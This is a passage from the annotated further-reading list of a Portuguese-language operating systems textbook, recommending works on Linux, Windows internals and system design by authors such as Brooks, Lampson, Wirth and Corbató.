as coisas serem feitas como são. Uma vantagem de se 
recorrer ao documento de referência é que, por defini- 
ção, não existem erros. Se um erro tipográfico no nome 
de uma macro surge no processo de edição, ele não é 
mais um erro, mas sim uma definição oficial. 


Fusco, The Linux Programmer 5 Toolbox 


Esse livro descreve o uso do Linux para o usuário 
intermediário, aquele que conhece o básico e quer co- 
meçar a explorar o funcionamento dos diferentes pro- 
gramas do Linux. É direcionado a programadores em C. 


Maxwell, Linux Core Kernel Commentary 


As primeiras 400 páginas desse livro contêm um 
subconjunto do código do núcleo do Linux. As últimas 
150 páginas são comentários sobre o código, usando 
muito do estilo do livro clássico de John Lions (1996). 
Se você quer compreender o núcleo do Linux em to- 
dos os seus detalhes, esse é um livro bom para começar, 
mas cuidado: a leitura de 40 mil linhas de C não é para 
qualquer um. 


13.1.11 Estudo de caso 2: Windows 8 


Cusumano e Selby, “How Microsoft Builds Software” 


Você sempre quis saber como alguém poderia escre- 
ver um programa de 29 milhões de linhas (assim como 
o Windows 2000) e que funcionasse? Para saber como 
o ciclo de construção e teste da Microsoft é usado para 
gerenciar grandes projetos de software, dê uma olhada 
nesse artigo. O procedimento é bastante instrutivo. 


Rector e Newcomer, Win32 Programming 


Se você está procurando por um daqueles livros de 
1.500 páginas que apresentam um resumo de como es- 
crever programas Windows, esse é um bom começo. 
Ele aborda janelas, dispositivos, saída gráfica, entrada 


pelo teclado e mouse, impressão, gerenciamento de me- 
moria, bibliotecas e sincronização, entre muitos outros 
tópicos. Requer conhecimento de C ou C++. 


Russinovich e Solomon, Windows Internals, Part 1 


Se você quer aprender a usar o Windows, existem 
centenas de livros sobre o assunto. Se você deseja co- 
nhecer o funcionamento interno do Windows, esse livro 
é a sua melhor aposta. Ele aborda diversos algoritmos 
e estruturas de dados internos com detalhes técnicos 
substanciais. Nenhum outro livro chega perto desse. 


13.1.12 Projeto de sistemas operacionais 


Saltzer e Kaashoek, Principles of Computer System 
Design: An Introduction 


O livro examina os sistemas de computação em ge- 
ral, e não os sistemas operacionais por si sós; porém, os 
princípios que eles identificam também se aplicam em 
grande parte aos sistemas operacionais. O interessante 
sobre esse trabalho é que ele identifica cuidadosamente 
“as ideias que funcionaram”, como nomes, sistemas de 
arquivos, coerência de leitura-escrita, mensagens auten- 
ticadas e confidenciais etc. — princípios que, em nossa 
opinião, todos os cientistas de computação do mundo 
deveriam recitar todos os dias, antes de irem para o 
trabalho. 


Brooks, O mítico homem-mês: ensaios sobre engenha- 
ria de software 


Fred Brooks foi um dos projetistas do OS/360 da 
IBM. Ele descobriu a duras penas o que funciona e o 
que não funciona. As recomendações dadas por esse 
livro inteligente, divertido e informativo são tão váli- 
das agora quanto eram há mais de um quarto de século, 
quando foi escrito. 


Cooke et al., “UNIX and Beyond: An Interview with 
Ken Thompson” 


Projetar um sistema operacional é muito mais uma 
arte do que uma ciência. Em consequência, ouvir os es- 
pecialistas nesse campo é uma boa maneira de aprender 
sobre o assunto. Eles não são muito mais especialistas 
do que Ken Thompson, coprojetista de UNIX, Inferno 
e Plan 9. Nessa entrevista abrangente, Thompson fala 
sobre sua opinião acerca de onde viemos e para onde 
estamos indo nessa área. 


Corbató, “On Building Systems that Will Fail” 


Em sua palestra durante o Turing Award, o pai dos 
sistemas de tempo compartilhado aborda muitas das 


mesmas preocupações apresentadas por Brooks em O 
mítico homem-mês. Sua conclusão é que todos os sis- 
temas complexos falharão e que, para que se tenha 
qualquer possibilidade de sucesso, é absolutamente es- 
sencial evitar a complexidade e lutar pela simplicidade 
e elegância no projeto. 


Crowley, Operating Systems: A Design-Oriented 


Approach 


Muitos livros sobre sistemas operacionais simples- 
mente descrevem os conceitos básicos (processos, me- 
mória virtual etc.) e trazem alguns exemplos, mas não 
dizem nada sobre como projetar um sistema operacio- 
nal. O livro de Crowley é único e dedica quatro capitu- 
los ao assunto. 


Lampson, “Hints for Computer System Design” 


Butler Lampson, um dos projetistas líderes mun- 
diais de sistemas operacionais inovadores, colecionou 
muitas dicas, sugestões e orientações de seus anos de 
experiência e reuniu tudo nesse artigo informativo e in- 
teressante. Assim como o livro de Brooks, essa é uma 
leitura necessária para todos os aspirantes a projetistas 
de sistemas operacionais. 


Wirth, “A Plea for Lean Software” 


Niklaus Wirth, um famoso e experiente projetista de 
sistemas, tratou, nesse livro, de software simples e efi- 
ciente baseado em alguns conceitos simples, em vez da 
volumosa desordem apresentada por muitos softwares 
comerciais. Ele expõe seu ponto de vista discutindo seu 
sistema Oberon — um sistema operacional baseado em 
GUI e orientado à rede, que se limita a 200 KB, incluin- 
do o compilador Oberon e o editor de textos. 
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